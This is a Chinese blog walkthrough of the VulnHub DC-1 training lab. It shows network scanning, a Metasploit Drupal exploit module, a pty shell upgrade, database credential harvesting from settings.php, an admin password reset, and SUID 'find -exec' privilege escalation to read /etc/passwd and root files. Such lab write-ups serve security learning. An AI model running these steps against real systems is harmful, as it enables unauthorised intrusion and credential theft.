[内网渗透]DC1

最新推荐文章于 2024-07-19 16:27:02 发布
最新推荐文章于 2024-07-19 16:27:02 发布
阅读量61 收藏
点赞数
分类专栏: 内网渗透 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/131860717
版权

文章目录

[内网渗透]DC1

环境搭建

https://www.vulnhub.com/entry/dc-1,292/

信息收集

扫IP、端口:

nmap -sS 192.168.56.1/24 -T4
image-20230721201724820

扫描详细信息:

nmap -A -T4 192.168.56.136

image-20230721201848202

可以知道是:Drupal的CMS

目录扫描:

dirb http://192.168.56.136
image-20230721201935537

靶机渗透

首先通过靶机ip的80端口访问网站:

image-20230721202056848

测试了一下,好像没什么利用点

于是我们想到Drupal 7cms中可能存在某些漏洞,我们使用著名的metasploit

msfconsole

启动后搜索drupal

search drupal

image-20230721202402795

这里第一个是可以用的,我们可以使用use来选择模块:

use 1

输入info命令,可以获得该漏洞相关的信息

image-20230721202512776

在msf中我们可以使用options命令来查看当前模块的相关选项:

options

image-20230721202623849

这里只需要设置一下目标的ip(RHOSTS)即可:

set RHOSTS 192.168.56.136

然后输入:

run
或
exploit

来利用改漏洞模块即可。等待一会就利用成功了:

image-20230721202901027

我们输入getuid命令(该命令可以获取当前会话的用户标识,需要建立会话才能使用)查看一下当前的权限:

image-20230721203140296

www-data用户

接下来我们就需要找flag了,这里有5个flag

flag1
ls
cat flag1.txt

image-20230721203247712

flag1.txt

Every good CMS needs a config file - and so do you.

提示我们需要在配置文件中寻找

flag2

问一下gpt

image-20230721203412212

获得路径:

sites/default/settings.php

查看:

cat sites/default/settings.php
image-20230721203459675

找到了flag2:

* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?

暴力破解密码不可取

并且获得了mysql数据库的账号和密码,于是我们需要去登录mysql:

flag3

我们先使用ps aux | grep 3306查看一下是否开放了3306端口:

发现进程中没有匹配到3306端口,说明mysql没对外开放

我们可以获取一个交互式的shell,先输入:shell,然后输入:

python -c 'import pty;pty.spawn("/bin/bash")'

这样就获取到了一个交互式的shell

我们登录数据库

image-20230721211151769

查询users表下存在admin用户的密码为hash值:

image-20230721211302034

这种hash值很难破解,应该是使用脚本进行加密的

我们在当前目录下发现script文件夹,其下存在加密脚本:

image-20230721211355866

我们对字符串admin进行加密:

php scripts/password-hash.sh "admin"

image-20230721211801913

然后将admin的密码修改:

image-20230721212032980

admin:admin

登录网站:

image-20230721212219022

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

这里有几个关键词:PERMSFIND-exec

很明显了,应该是要提权的

flag4
find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null

image-20230721212748789

刚好有个find可以用来提权了:

因为find去执行命令的时候,每找一个文件都执行一次,为了不执行多次,我们先创建一个空文件,然后再根据该文件执行命令

touch demo
find demo -exec cat /etc/passwd \;
# 查看一下/etc/passwd

image-20230721213127457

flag4在 /home/flag4

image-20230721213301283

Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy.  Or maybe it is?
flag5

如果直接查看/root,提示没有权限

image-20230721213411547

前面的find提权派上用场了:

find demo -exec cat /root/thefinalflag.txt \;

image-20230721213526846

拿到了flag5

总结

这里有一个东西挺重要的:

python -c 'import pty;pty.spawn("/bin/bash")'

这个代码可以获得交互式的shell

这个命令是一个基于 Python 的简单技巧,用于在当前终端创建一个交互式的伪终端(PTY)。它可以用于提升当前终端的特权,以便执行更高级的操作。

具体来说,这个命令的作用是导入 pty 模块,并使用 pty.spawn() 函数来创建一个交互式的 Bash shell。/bin/bash 是一个常见的 Bash shell 的路径,在这个命令中被传递给 pty.spawn() 函数。

执行这个命令后,会话将转变为一个具有完整的交互式 Shell 功能的终端,您可以在其中执行各种命令,浏览文件系统,编辑文件等等。

需要注意的是,这个命令只在当前终端有效,如果您想要将会话保持开启并在其他地方访问,可能需要使用其他技术,比如使用反向 Shell 或者 Tunneling 等方法。此外,在某些情况下,这样的操作可能会违反法律或规定,请确保您拥有适当的权限和合法性来执行相关操作。

Tr4n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-1内网靶机渗透
weixin_42373409的博客
01-12 511
DC-1内网靶机渗透 实验环境: 靶机:DC-1 渗透机:kali 2020; 实验内容: 首先下载并启动我们的靶机; 1.由于我们进行内网渗透,并且不知道靶机的IP地址,所以我们先进行arp扫描,确定靶机IP地址,arp扫描命令为:arp-scan -l 2.确定了我们靶机的IP地址为192.168.131.136之后,首先要考虑的是它开放了那些端口提供了哪些服务,所以首选用nmap工具进行扫描开放端口 命令:nmap -A 192.168.131.136 3.用namp扫描之后,我们发现靶机开放了22、
内网渗透技巧大全
黑战士的博客
04-28 1379
对于内部帐户,SPN将自动进行注册。SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system。安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。
渗透靶场--DC1
weixin_45794666的博客
07-20 578
DC1 攻击机ip:192.168.1.164 靶机ip:192.168.1.163 目标:获取靶机上的5个flag 1.内网渗透,先利用namp扫描整个网段 目标机为192.168.1.163 2.继续nmap嗅探端口信息,。 开放了22/80/111/56771端口 3.那就访问80端口 是一个网站 CMS为Drupal 4.使用dirseach扫描网站目录,扫出了一个robots.txt # # robots.txt # # This file is to prevent the crawli
内网渗透横向攻击流程
qingkahui24689的博客
05-06 888
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
我所了解的内网渗透——内网渗透知识大总结
2401_84466316的博客
04-23 576
组策略使管理员能够管理Active Directory中的计算机和用户。组策略保存为组策略对象(GPO)攻击者可以滥用GPO,通过欺诈方式进一步自动化地传播恶意软件、实现持久化驻留目的恶意软件可以利用GPO穿越IDS/IPS等防火墙,最终访问到域内所有的系统。GPO的另一优点就是攻击过程期间并不需要目标系统在线,一旦离线状态下的目标系统重新登录到域中,恶意的GPO载荷就会被投递到目标系统。组策略默认情况下每90分钟(域控制器5分钟)可包括安全选项,注册表项。
内网渗透方面的总结
bezal的专栏
05-21 1547
T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security+ U6 b- M: R" c2 {# I1 S 最近在内网渗透方面,发了几个帖子,得到了群里的大牛们的积极帮助,我把大牛们给经验整理了一下,以表示对t00ls的感谢,内网渗透不得不说是门艺术,越学越感觉有意思,俗话说的好,师傅领进门,学习在个人。 大牛给的是个思路,条条大道通
内网渗透DC-1靶场通关(CTF)
qq_35664104的博客
08-12 1305
最新博客见我的个人博客地址 DC系列共9个靶场,本次来试玩一下DC-1,共有5个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 首先在kali中扫一下目标ip arp-scan -l 通过排除,发现目标ip为:192.168.0.119 经典套路,nmap扫一把 nmap -sS -sV 192.168.0.119 发现目标开启80和22端口 我们先看一下他的
DC1靶机渗透测试
Huangshanyoumu的博客
04-16 723
Vuln hub 渗透测试实战 Vulnhub是一个开放的安全靶场,我们可以使用它所提供的环境进行渗透测试实战。 DC所有环境下载地址:https://www.vulnhub.com/series/dc,199/ 环境搭建: 1.下载 OVA(Open Virtualization Appliance:开放虚拟化设备)https://www.vulnhub.com/entry/dc-1-1,292/ 2.拖入 VMware 打开,配置相关设置,开启运行 3.打开 Kali Linux 进行渗透 1.探测
渗透测试Vulnhub-DC1
TenG的博客
04-17 246
前言 各位师傅们好,在正式写文章前罗嗦几句,很早以前就想搭一个内网渗透的靶场来练习了,不过因为一些原因一直在往后推迟(主要是因为太懒)。这段时间发生了一些事情让我坚定了搞搞内网渗透的信念,目前来说事请还是挺不好的,跟一位最近朋友说过以后他跟我讲以后更大的坎还多着呢,他也跟我说了下自己的心酸往事,听过以后自己也有了些许感触,而这件事请对于我来说到底是好是坏待以后时间证明(至少目前是感觉挺失落的)。还有就是有一个姐姐真好,也正是她一直以来的安慰才能让我调整这么快,不管是这次还是从前或以后兜希望老姐一直能陪着我。
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
esp_dc1:DC1插线板固件
04-14
已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一个自定义的固件,来完整实现DC1联网控制。作者声明注意: 本项目主要目的为作者本人自己学习及使用DC1插线板而开发,本着开源精神及造福网友而开源,仅...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC1_map_airtrafficcontrol_
10-02
"DC1_map_airtrafficcontrol_" 这个标题暗示我们正在处理一个与空管相关的项目,该项目可能涉及计算特定的指标——Map值,并通过用户界面(UI)展示这些数据。Map在这里指的是监控扇区告警参数,它对于评估和优化...
斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT
02-18
DC1固件斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT 斐讯DC1插座固件斐讯DC1插座固件斐讯DC1插座固件
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 845
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
最新发布
亚信安全官方账号的博客
07-19 464
一站式云安全托管限时试用 开启全能高效攻防
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
Thewei666的博客
07-17 1103
区分不同的签名。
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 596
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
dc1无法反弹shell
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标机器上正确添加了反弹shell的代码,并将其放置在适当的位置,比如backups.sh文件中。最后,您需要等待计划任务执行反弹shell的代码。如果仍然无法成功反弹shell,请检查您的代码和配置是否正确,并确保您有足够的权限执行这些操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值